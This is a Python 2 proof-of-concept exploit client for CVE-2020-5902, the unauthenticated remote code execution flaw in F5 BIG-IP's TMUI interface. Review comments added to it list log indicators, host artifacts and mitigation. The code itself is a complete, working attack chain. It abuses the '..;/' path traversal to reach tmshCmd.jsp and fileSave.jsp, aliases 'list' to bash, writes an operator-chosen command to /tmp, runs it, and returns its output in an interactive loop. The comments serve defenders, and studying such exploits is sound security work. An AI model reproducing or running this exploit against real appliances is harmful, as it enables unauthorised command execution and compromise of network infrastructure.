#coding:utf-8
# Python 2 proof-of-concept client for CVE-2020-5902 (F5 BIG-IP TMUI), as named
# in the banner below.
#
# NOTE(review): this copy of the file lost its line breaks and indentation.
# The layout below is reconstructed from the statement order; nesting that
# could not be determined with certainty is marked where it occurs.
#
# What a defender can take from this file:
#   * Every request path starts with "/tmui/login.jsp/..;/" and then names a
#     JSP under /tmui/locallb/workspace/ (tmshCmd.jsp or fileSave.jsp). No
#     credentials, cookies or tokens are sent anywhere in this script, so such
#     paths in TMUI access logs are worth alerting on.
#   * The operator's command travels verbatim in the query string
#     (fileSave.jsp ... &content=<command>), so it is visible wherever full
#     request URLs are logged.
#   * Host artifacts: a file /tmp/<uuid> that this script never removes, and a
#     private tmsh alias named "list" that exists between the first and the
#     last request of each round.
#   * Mitigation is the vendor fix for CVE-2020-5902 and keeping the TMUI
#     management interface unreachable from untrusted networks.
import requests
import json
import requests.packages.urllib3
# Turns off urllib3 warnings; presumably to hide the insecure-request warning
# that verify=False would otherwise print on every call.
requests.packages.urllib3.disable_warnings()
import uuid
import sys  # only referenced by the commented-out sys.argv line in __main__

# Request sequence used by the functions below:
# tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
# fileSave.jsp?fileName=/tmp/cmd&content=id
# tmshCmd.jsp?command=list+/tmp/cmd
# tmshCmd.jsp?command=delete+cli+alias+private+list

# NOTE(review): the ASCII-art rows of the banner were collapsed onto one line
# in this copy; the text is kept exactly as found rather than re-guessed.
banner = r''' _______ _______ ______ _________ _______ _________ _______ _______ _______ _______ ( ____ \( ____ \ ( ___ \ \__ __/( ____ \ \__ __/( ____ ) ( ____ )( ____ \( ____ \ | ( \/| ( \/ | ( ) ) ) ( | ( \/ ) ( | ( )| | ( )|| ( \/| ( \/ | (__ | (____ | (__/ / | | | | | | | (____)| | (____)|| | | (__ | __) (_____ \ | __ ( | | | | ____ | | | _____) | __)| | | __) | ( ) ) | ( \ \ | | | | \_ ) | | | ( | (\ ( | | | ( | ) /\____) ) | )___) )___) (___| (___) | ___) (___| ) | ) \ \__| (____/\| (____/\ |/ \______/ |/ \___/ \_______/(_______) \_______/|/ |/ \__/(_______/(_______/ CVE-2020-5902 UnAuth RCE Vuln Python By Jas502n From: https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb ____________________________________________________________________________________________________________________________________________________ '''

def tmshCmd_exit(url,file,cmd):
    """Step 1 of 4: ask tmshCmd.jsp to alias the tmsh `list` command to bash.

    url  -- base URL of the appliance; the path is appended as-is.
    file -- file name (under /tmp) passed through to the later steps.
    cmd  -- command text passed through to upload_exit().

    On a 200 response whose headers contain the text 'tmui' the chain
    continues with upload_exit(); otherwise it stops here. Returns None.
    """
    tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
    # Unused: only the commented-out request below passes `proxies`
    # (a local intercepting proxy on 127.0.0.1:8080).
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    # verify=False: the server certificate is not checked.
    # allow_redirects=False: a 3xx answer is not followed and therefore fails
    # the status check below.
    r = requests.get(tmshCmd_url,verify=False,allow_redirects=False)
    # r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies)
    # Serialises the private `_store` dict of requests' header object so the
    # header names and values can be searched as one string.
    response_str = json.dumps(r.headers.__dict__['_store'])
    # print type(response_str)
    # print response_str
    # 'tmui' in the headers is used as the marker that TMUI itself answered;
    # which header carries it is not visible here -- TODO confirm.
    if r.status_code == 200 and 'tmui' in response_str:
        # print tmshCmd_url
        print "[+] tmshCmd.jsp Exit!" 
        print "[+] create cli alias private list command bash \n"
        # cmd = 'whoami'
        upload_exit(url,file,cmd)
    else:
        print "[+] tmshCmd.jsp No Exit!\n"

def upload_exit(url,file,cmd):
    """Step 2 of 4: write `cmd` into /tmp/<file> through fileSave.jsp.

    On a 200 response whose headers contain 'tmui' the chain continues with
    list_command(); otherwise it stops. Returns None.
    """
    # `%` binds tighter than `+`: `file` is formatted into the URL and `cmd`
    # is then appended unchanged, so the command text appears literally after
    # "content=" in the request line.
    fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content="%file + cmd
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}  # unused, see tmshCmd_exit
    r = requests.get(fileSave_url,verify=False,allow_redirects=False)
    # r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    if r.status_code == 200 and 'tmui' in response_str:
        # print fileSave_url
        print "[+] fileSave.jsp Exit!\n"
        list_command(url,file)
    else:
        print "[+] fileSave.jsp No Exit!\n"

def list_command(url,file):
    """Step 3 of 4: request `list /tmp/<file>` and print the returned output.

    The response body is parsed as JSON and its 'output' field is printed,
    after which delete_list() removes the alias. Returns None.
    """
    rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}  # unused, see tmshCmd_exit
    r = requests.get(rce_url,verify=False,allow_redirects=False)
    # r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    # print len(r.content)
    if r.status_code == 200 and 'tmui' in response_str:
        # 33 is a magic threshold; presumably the length of a response that
        # carries no output -- TODO confirm.
        if len(r.content) > 33:
            # print rce_url
            print "[+] Command Successfull !\n"
            command_result = json.loads(r.content)
            print "_"*90,'\n\n'
            print command_result['output']
            print "_"*90,"\n\n"
            # NOTE(review): nesting reconstructed. As laid out here the alias
            # is removed only after a successful read; on every other path it
            # stays defined on the appliance.
            delete_list(url)
        else:
            # NOTE(review): this `else` is assumed to pair with the length
            # check; if so, a non-200 answer prints nothing at all.
            print "[+] Command Failed !\n"

def delete_list(url):
    """Step 4 of 4: delete the private `list` alias created in step 1.

    Only the alias is removed; nothing in this script deletes the file that
    step 2 wrote under /tmp. Returns None.
    """
    delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}  # unused, see tmshCmd_exit
    r = requests.get(delete_url,verify=False,allow_redirects=False)
    # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    if r.status_code == 200 and 'tmui' in response_str:
        # print delete_url
        print "[+] delete cli alias private list Successfull! \n"
    else:
        print "[+] delete cli alias private list Failed! \n"

if __name__ == '__main__':
    print banner
    # Interactive loop with no exit condition other than interrupting the
    # process; each round runs the four requests above.
    while 1:
        # Placeholder address. It ends in "/" and every path above starts
        # with "/", so the URLs are built with a double slash ("//tmui/...").
        url = "https://x.x.x.x/"
        # url = sys.argv[1]
        # A fresh version-1 UUID names the /tmp file for each round, so the
        # leftover files on a host have UUID-shaped names.
        file = str(uuid.uuid1())
        print "/tmp/" + file,"\n"
        cmd = raw_input("[+]Set Cmd= ")
        # NOTE(review): kept on one line as found. The function returns None,
        # so this prints "None" after each round; the original may have been a
        # bare `print` followed by the call on its own line -- line breaks were
        # lost in this copy.
        print tmshCmd_exit(url,file,cmd)